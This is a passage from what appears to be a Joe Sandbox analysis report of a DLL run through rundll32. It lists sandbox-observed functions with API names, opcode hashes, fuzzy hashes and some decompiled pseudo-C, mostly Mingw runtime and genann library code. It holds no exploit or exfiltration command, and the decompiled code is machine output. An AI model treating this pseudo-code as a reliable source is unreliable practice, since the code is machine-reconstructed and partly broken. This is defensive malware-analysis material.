                                      • Instruction Fuzzy Hash: 36F04931218E0A4FEB84EF9AC4DC771B7B0FB58305F60002AD10AC2190C774ACA4E700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C01AAC Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: DestroyHeap
                                      • String ID:
                                      • API String ID: 2435110975-0
                                      • Opcode ID: 6bee0d47c2223d56f047f492df5b049f4a47428231dacf7fdd2a0f68541b21f6
                                      • Instruction ID: a3032cae2ea9e4c98ae8ed138309475dc8e7ccaa7c0b0ccec29b1aee5fc7f911
                                      • Opcode Fuzzy Hash: 6bee0d47c2223d56f047f492df5b049f4a47428231dacf7fdd2a0f68541b21f6
                                      • Instruction Fuzzy Hash: 57016D75B0C5C48FF754EFFAACE952576B1FB89B14744003BD04AD6165CA3C68808752
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C01A58 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: CreateHeap
                                      • String ID:
                                      • API String ID: 10892065-0
                                      • Opcode ID: b4ad1c0d008e997b21b3bc8a6b3226dd8f46068eaaf9a4adb11886a91f20d782
                                      • Instruction ID: 11b03ff7a2c96b8ad5f191002f8bf852cf9cda418336143b872da458ac8bdf4b
                                      • Opcode Fuzzy Hash: b4ad1c0d008e997b21b3bc8a6b3226dd8f46068eaaf9a4adb11886a91f20d782
                                      • Instruction Fuzzy Hash: 3EF0A026B0C1C94AF710AFFA5C9C137A672EB89321F255A3BE14BD6182D93D98C18241
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C02438 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: FunctionTable
                                      • String ID:
                                      • API String ID: 1252446317-0
                                      • Opcode ID: da1bb901ed9c28df9a08ea54ec9af0cff9c0e4c1eb0d809aed45ddb1847367b8
                                      • Instruction ID: 5d4da780d9484f1210faa8de8b0593b035d6e8f21040fd0dc0b72707f654fbdd
                                      • Opcode Fuzzy Hash: da1bb901ed9c28df9a08ea54ec9af0cff9c0e4c1eb0d809aed45ddb1847367b8
                                      • Instruction Fuzzy Hash: 5DE04F305109055BEB68EBADC84DBA03AE0EB5C319F50426DD409C5192CB3998DBCF82
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C2389C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: _malloc_dbg
                                      • String ID:
                                      • API String ID: 1527718024-0
                                      • Opcode ID: ba10474536fbb38330a4b47089a3fce4b8d26237f951e2caf266900230737eed
                                      • Instruction ID: b2e0facebb4b186569dfe3c4c799b8cdbc23df6ee7c3bf2a6a98227e0495799a
                                      • Opcode Fuzzy Hash: ba10474536fbb38330a4b47089a3fce4b8d26237f951e2caf266900230737eed
                                      • Instruction Fuzzy Hash: CED05E12B15E0D1BAB9CA6FF1C9D13626E5E7D81227440537AC09C2261EC68CC864250
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C71C6C Relevance: 1.5, APIs: 1, Instructions: 23COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0
                                      • Opcode ID: bccd8a624eb6b28d8ce315b06ee3766c31c6b0b7e90251d88198d832bd84872c
                                      • Instruction ID: 01add39f6a1bfd900e3ecdd5735d2976e9ccf2b0c58e886e6be9ca1fdfcb1d94
                                      • Opcode Fuzzy Hash: bccd8a624eb6b28d8ce315b06ee3766c31c6b0b7e90251d88198d832bd84872c
                                      • Instruction Fuzzy Hash: D0E01235A1044856F749B771EC9E4E73771EB54300B804166D80B910B7ED2C52C68681
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C12590 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: d6e092558d37e5058eb99c715a6fdd0ef8159752f8b1518dfc606e572a5f4849
                                      • Instruction ID: d7737b02c071574f8961fb16775e12c354350c9bf5aa78c23973d13d9f649f94
                                      • Opcode Fuzzy Hash: d6e092558d37e5058eb99c715a6fdd0ef8159752f8b1518dfc606e572a5f4849
                                      • Instruction Fuzzy Hash: 9FB0122CD27C4B03ED5C3BFB0EBD0693870AF18205FC40114D816C0059E50CC5E95342
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C02BE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 2b6ebd628b6762cacce5267312cbc1474e2efd12aa7b3ce2d7e01679878ed3e9
                                      • Instruction ID: 01f8c864d187ec1d8ac46b5ba56906995442c0155a96ef831c188d40883f6af3
                                      • Opcode Fuzzy Hash: 2b6ebd628b6762cacce5267312cbc1474e2efd12aa7b3ce2d7e01679878ed3e9
                                      • Instruction Fuzzy Hash: 27B0122482BDBB06ED9D3BF70C6E0253870AF08311FC40054D80BC0040EE0CC5D46382
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C12B50 Relevance: 1.3, APIs: 1, Instructions: 37stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: lstrcmpi
                                      • String ID:
                                      • API String ID: 1586166983-0
                                      • Opcode ID: 4a93cf2f88255c0bb6d24dd12e50ceba59c46d297b66380d94f1b892c0c9261f
                                      • Instruction ID: 57dae1e2cf1766621eb98e3268235dafe1379f1cb68ac433f2e42de13678d7aa
                                      • Opcode Fuzzy Hash: 4a93cf2f88255c0bb6d24dd12e50ceba59c46d297b66380d94f1b892c0c9261f
                                      • Instruction Fuzzy Hash: B2F027363049094BFB649FAAAC886FB37B9EB84341B048726D40BC52A0EF2CDD54A744
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 00007FFC288E8500 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 159COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: _errno
                                      • String ID: -
                                      • API String ID: 2918714741-2547889144
                                      • Opcode ID: 68bb0a80ec49b0e7f88bd808b78395ea7d964b6984d12873a8541eda6f2b0fbb
                                      • Instruction ID: 2696a3ce3859f7ad0305adb1272e85ac0e810f0822ebfcb8963aed6b2ff07916
                                      • Opcode Fuzzy Hash: 68bb0a80ec49b0e7f88bd808b78395ea7d964b6984d12873a8541eda6f2b0fbb
                                      • Instruction Fuzzy Hash: B551D062E0D27E06FB615A219C4437E16C1EF11BA8F550932ED2A0E2D1DE3DF849C779
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFC288E2E90 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 77COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: _errno$freemallocperrorrand
                                      • String ID: %le$%d %d %d %d$fscanf
                                      • API String ID: 1124544454-3358677296
                                      • Opcode ID: 735b5874b61b143b278a93e138aa00dc076640b1d8bc7826092de63a36425ffd
                                      • Instruction ID: f0ac8e76d0cca94576e0a2e579a95c35ab953a7b7043933287f44c76c9461b2c
                                      • Opcode Fuzzy Hash: 735b5874b61b143b278a93e138aa00dc076640b1d8bc7826092de63a36425ffd
                                      • Instruction Fuzzy Hash: 3B218E73A1962A85E6619B15AD005AA6364EF94790F840037FE4E073D8EF7CE848CB39
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFC288E8770 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 151COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: _errno
                                      • String ID: -
                                      • API String ID: 2918714741-2547889144
                                      • Opcode ID: d85ffac46bb8c9478375b9dca42e0fe49a7e84fed0f35d7d7f0dcfffd4929f75
                                      • Instruction ID: d7b8f3efc13bfad5a19295d894ab0e34f706685f21caca0128e726a174d79d9a
                                      • Opcode Fuzzy Hash: d85ffac46bb8c9478375b9dca42e0fe49a7e84fed0f35d7d7f0dcfffd4929f75
                                      • Instruction Fuzzy Hash: 0951F122E0D57E06FB615A219C4033D1A81EF117A8F554933ED6E2E2C1DE3CE849C239
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFC288E23A0 Relevance: 14.1, APIs: 11, Instructions: 308memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Local$Free$Alloc$memcpy
                                      • String ID:
                                      • API String ID: 1922247932-0
                                      • Opcode ID: d6784d07d633169ee089b7567f5e597946a0749f05af4994d6e4f760a0c8c563
                                      • Instruction ID: a4d1b127b171e87feb2142dd02de427cd85691712f817ab12e5cdd0a204098ca
                                      • Opcode Fuzzy Hash: d6784d07d633169ee089b7567f5e597946a0749f05af4994d6e4f760a0c8c563
                                      • Instruction Fuzzy Hash: 8DD19E32A0966A86FB288F25DC9073933A1FF44B49F544136EA0D4A2C4DF3DE849C779
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFC288E3A10 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 115COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 47%
                                      			E00007FFC7FFC288E3A10(void* __ebx, long __rcx, long long __rdx, long long __r8, long long __r9, long long _a16, long long _a24, long long _a32) {
				void* _v32;
				intOrPtr _v108;
				void* _v144;
				void* _t19;
				void* _t20;
				void* _t22;
				void* _t26;
				intOrPtr _t42;
				long long _t44;
				intOrPtr* _t46;
				long long _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				void* _t51;
				void* _t52;
				signed long long _t55;
				long long _t59;
				intOrPtr _t64;
				struct _MEMORY_BASIC_INFORMATION* _t67;
				intOrPtr _t76;
				long long _t80;

				_t26 = __ebx;
				_t44 =  &_a16;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_v32 = _t44;
				_t20 = E00007FFC7FFC288F12C0(_t19, 2, _t44, __rcx);
				r8d = 0x1b;
				0x288f0ba8(_t51);
				_t52 = _v32;
				E00007FFC7FFC288F12C0(_t20, 2, _t44, "Mingw-w64 runtime failure:\n");
				_t59 = _t44;
				0x288f0b08();
				0x288f0bc8();
				asm("o16 nop [eax+eax]");
				_t80 = _t59;
				if (_t26 <= 0) goto 0x288e3bb0;
				_t46 =  *0x288ff0c8 + 0x18;
				asm("o16 nop [eax+eax]");
				_t64 =  *_t46;
				if (_t64 - _t80 > 0) goto 0x288e3acc;
				_t76 =  *((intOrPtr*)(_t46 + 8));
				r8d =  *((intOrPtr*)(_t76 + 8));
				if (_t80 - _t64 + _t76 < 0) goto 0x288e3b53;
				_t47 = _t46 + 0x28;
				if (1 != _t26) goto 0x288e3ab0;
				_t22 = E00007FFC7FFC288E4200();
				if (_t47 == 0) goto 0x288e3bd2;
				_t55 =  *0x288ff0c4 +  *0x288ff0c4 * 4 << 3;
				_t49 =  *0x288ff0c8 + _t55;
				 *((long long*)(_t49 + 0x20)) = _t47;
				 *_t49 = 0;
				E00007FFC7FFC288E4330(_t22, _t76);
				r8d = 0x30;
				_t50 =  *0x288ff0c8;
				 *((long long*)(_t50 + _t55 + 0x18)) = _t80 + _t49;
				VirtualQuery(_t52, _t67, __rcx);
				_t42 = _t50;
				if (_t42 == 0) goto 0x288e3bb7;
				if (_t42 == 0) goto 0x288e3b4c;
				if (_t42 != 0) goto 0x288e3b60;
				 *0x288ff0c4 =  *0x288ff0c4 + 1;
				return _v108;
			}
























                                      0x7ffc288e3a10
                                      0x7ffc288e3a1a
                                      0x7ffc288e3a24
                                      0x7ffc288e3a29
                                      0x7ffc288e3a2e
                                      0x7ffc288e3a33
                                      0x7ffc288e3a38
                                      0x7ffc288e3a3d
                                      0x7ffc288e3a52
                                      0x7ffc288e3a57
                                      0x7ffc288e3a61
                                      0x7ffc288e3a69
                                      0x7ffc288e3a6f
                                      0x7ffc288e3a74
                                      0x7ffc288e3a7a
                                      0x7ffc288e3a8f
                                      0x7ffc288e3a94
                                      0x7ffc288e3aa3
                                      0x7ffc288e3aa7
                                      0x7ffc288e3ab0
                                      0x7ffc288e3ab6
                                      0x7ffc288e3ab8
                                      0x7ffc288e3abc
                                      0x7ffc288e3ac6
                                      0x7ffc288e3acf
                                      0x7ffc288e3ad5
                                      0x7ffc288e3ada
                                      0x7ffc288e3ae5
                                      0x7ffc288e3af6
                                      0x7ffc288e3afa
                                      0x7ffc288e3afd
                                      0x7ffc288e3b01
                                      0x7ffc288e3b07
                                      0x7ffc288e3b14
                                      0x7ffc288e3b1d
                                      0x7ffc288e3b24
                                      0x7ffc288e3b29
                                      0x7ffc288e3b2f
                                      0x7ffc288e3b32
                                      0x7ffc288e3b42
                                      0x7ffc288e3b4a
                                      0x7ffc288e3b4c
                                      0x7ffc288e3b5b

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: QueryVirtual
                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                      • API String ID: 1804819252-1534286854
                                      • Opcode ID: 02008b3e5bb103b3afd73c81780cf105471e2ef8eecae5ab65a97716877332af
                                      • Instruction ID: c5e322d7ad8e4639e30b96b2ffedf3812293cf44db5bc32554d3b997ad9bf01e
                                      • Opcode Fuzzy Hash: 02008b3e5bb103b3afd73c81780cf105471e2ef8eecae5ab65a97716877332af
                                      • Instruction Fuzzy Hash: 7C41C471B08B5A81EB109B11EC4027973A0FF95B84F884136EA4D4B7D4EF3CE448C728
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFC288E3090 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 185COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: _assert$memcpy
                                      • String ID: genann\genann.c$o - ann->output == ann->total_neurons$w - ann->weight == ann->total_weights
                                      • API String ID: 3718630003-1318605265
                                      • Opcode ID: e190a37e812a3474c16ec5c6e7c50aab393a5329ba5c128ff7ae18e22b284ef4
                                      • Instruction ID: 90cac3234885d278a967771c551080853e9c27d233eb048253d5aa12967216c9
                                      • Opcode Fuzzy Hash: e190a37e812a3474c16ec5c6e7c50aab393a5329ba5c128ff7ae18e22b284ef4
                                      • Instruction Fuzzy Hash: DE71F232E14A5D86DB25CF29CD4013A7361FF15786F89C236DA1D5B280EF38E86AC324
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFC288E8180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 40%
                                      			E00007FFC7FFC288E8180(signed int __ecx, signed int __edx, void* __eflags, void* __rdx) {
				signed int _t3;
				signed int _t6;
				void* _t9;

				asm("movaps [esp+0x40], xmm6");
				asm("dec ax");
				asm("dec ax");
				asm("movapd xmm2, xmm0");
				_t3 = __edx & 0x000fffff | __ecx;
				_t6 = __edx & 0x7ff00000;
				r8d = _t3;
				r8d = r8d | _t6;
				if (__eflags == 0) goto 0x288e81f0;
				_t9 = _t6 - 0x7ff00000;
				if (_t9 == 0) goto 0x288e8208;
				asm("comisd xmm0, [0xb5bc]");
				if (_t9 > 0) goto 0x288e8270;
				asm("movsd xmm1, [0xb5a6]");
				asm("pxor xmm0, xmm0");
				asm("comisd xmm1, xmm2");
				if (_t9 <= 0) goto 0x288e8310;
				asm("movaps xmm6, [esp+0x40]");
				return _t3;
			}






                                      0x7ffc288e8184
                                      0x7ffc288e8189
                                      0x7ffc288e818e
                                      0x7ffc288e8193
                                      0x7ffc288e81a2
                                      0x7ffc288e81a6
                                      0x7ffc288e81ac
                                      0x7ffc288e81af
                                      0x7ffc288e81b2
                                      0x7ffc288e81b4
                                      0x7ffc288e81ba
                                      0x7ffc288e81bc
                                      0x7ffc288e81c4
                                      0x7ffc288e81ca
                                      0x7ffc288e81d2
                                      0x7ffc288e81d6
                                      0x7ffc288e81da
                                      0x7ffc288e81e0
                                      0x7ffc288e81e9

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: _errno
                                      • String ID: exp
                                      • API String ID: 2918714741-113136155
                                      • Opcode ID: d1d1dcc1b485baa2fffa771909adaccb74c373e4d3286d3a411ca18d67bb767f
                                      • Instruction ID: e3abe022e303307bc22ce1561861b23a273ffe292060a30271dc2719eb8d7aa3
                                      • Opcode Fuzzy Hash: d1d1dcc1b485baa2fffa771909adaccb74c373e4d3286d3a411ca18d67bb767f
                                      • Instruction Fuzzy Hash: A0512622D0CE5D82E303AF34EC1116E6361FFA7745F809332E689255A8EF2ED455CA54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFC288E8EC0 Relevance: 6.3, APIs: 4, Instructions: 319COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID:
                                      • API String ID: 2221118986-0
                                      • Opcode ID: 805e3f78ab6754860f43c6c92a3b6ca52ef1522a5984a8971599d109d4b6c01c
                                      • Instruction ID: f430a03b1fe3fa3c4ac9f8ee10a8108a0dc5a90d9dc596889f152c0b8bcc76b5
                                      • Opcode Fuzzy Hash: 805e3f78ab6754860f43c6c92a3b6ca52ef1522a5984a8971599d109d4b6c01c
                                      • Instruction Fuzzy Hash: 40C11762E1826A86EB604A24CC0437E26A1FF10769F154236EE1D4F7C5CABDEC49C778
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFC288E9400 Relevance: 6.2, APIs: 4, Instructions: 241COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d2a52c11119825b675356fc753dfd308eadb1c865dec9a01802f63490371f166
                                      • Instruction ID: 233040beabea506d91f931639d43f7f6aee0579a65c19cb58b366bdcdc8dc552
                                      • Opcode Fuzzy Hash: d2a52c11119825b675356fc753dfd308eadb1c865dec9a01802f63490371f166
                                      • Instruction Fuzzy Hash: AF91C8B2E0926E86E7658F298D003796791FB05B99F548132EE0D1B7C4DBBCE809C774
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFC288E1010 Relevance: 6.1, APIs: 4, Instructions: 124sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Sleep_amsg_exit
                                      • String ID:
                                      • API String ID: 1015461914-0
                                      • Opcode ID: da23177db8870cd305cfdc912a2b4f64142ffc19fd8b7c68ca74381044dd9292
                                      • Instruction ID: 4d7ddfd47ac0edee89ff6ba75b0d573b944427f3290916c0ad9dc36e9ea1b6df
                                      • Opcode Fuzzy Hash: da23177db8870cd305cfdc912a2b4f64142ffc19fd8b7c68ca74381044dd9292
                                      • Instruction Fuzzy Hash: D8417E36A0956A86F6569B16EC503792291FF94795F884037DD0C8B3D5DE3CE889C338
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFC288F0BF0 Relevance: 6.1, APIs: 4, Instructions: 92COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Byte$CharLeadMultiWide
                                      • String ID:
                                      • API String ID: 2561704868-0
                                      • Opcode ID: 7c9ce33a7e5a0fb0f6908d8783dccc228db8783c15d05485717ff8ae8e8f10b9
                                      • Instruction ID: e80eb62b776c49c995f87c6ad719e5db84001aba7ac457696dffec3961fbdc56
                                      • Opcode Fuzzy Hash: 7c9ce33a7e5a0fb0f6908d8783dccc228db8783c15d05485717ff8ae8e8f10b9
                                      • Instruction Fuzzy Hash: FA31E672A0C2958BE3A08B28FC0036D7690FBB5794F948236DA98877D5DF3DD489CB14
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFC288E3330 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 317COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: genann\genann.c$w - ann->weight == ann->total_weights
                                      • API String ID: 3510742995-1732016904
                                      • Opcode ID: 5a7260e50099df0275c28712a2baaf7ca60d64651466be3262114e1141f13a5f
                                      • Instruction ID: 12773453919cc770f542f0efc633b16ce3af45b9460e205bda51a9ab836deee9
                                      • Opcode Fuzzy Hash: 5a7260e50099df0275c28712a2baaf7ca60d64651466be3262114e1141f13a5f
                                      • Instruction Fuzzy Hash: 64D11872A18E5986CB21CF24EC5062DB764FF957C8F059323EA4E27BA4DB38E945C710
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFC288E2A70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: _assert
                                      • String ID: !isnan(a)$genann\genann.c
                                      • API String ID: 1222420520-4084395310
                                      • Opcode ID: c64f3bb4aa90e2a2e17399b77a9a3f6e58ef0b4053caa16cef96f264f7440d6f
                                      • Instruction ID: 22a24c13c9cd37657a2c15c6374b3041cd877044d6c1f894524896f91ec68324
                                      • Opcode Fuzzy Hash: c64f3bb4aa90e2a2e17399b77a9a3f6e58ef0b4053caa16cef96f264f7440d6f
                                      • Instruction Fuzzy Hash: DB119351E08EAEC5EA239B349C112355315FFA23C5F84C333F40D6A1E1EF2DA05AC628
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFC288ECFC0 Relevance: 5.1, APIs: 4, Instructions: 125COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 82%
                                      			E00007FFC7FFC288ECFC0(signed int __edx, void* __eflags, void* __rax, void* __rcx) {
				void* _t6;
				void* _t12;
				void* _t13;
				intOrPtr* _t15;
				void* _t20;
				void* _t21;
				intOrPtr* _t27;
				void* _t32;

				_t21 = __rax;
				if (__eflags != 0) goto 0x288ed118;
				if (__eflags == 0) goto 0x288ed05b;
				_t27 =  *0x288ff180;
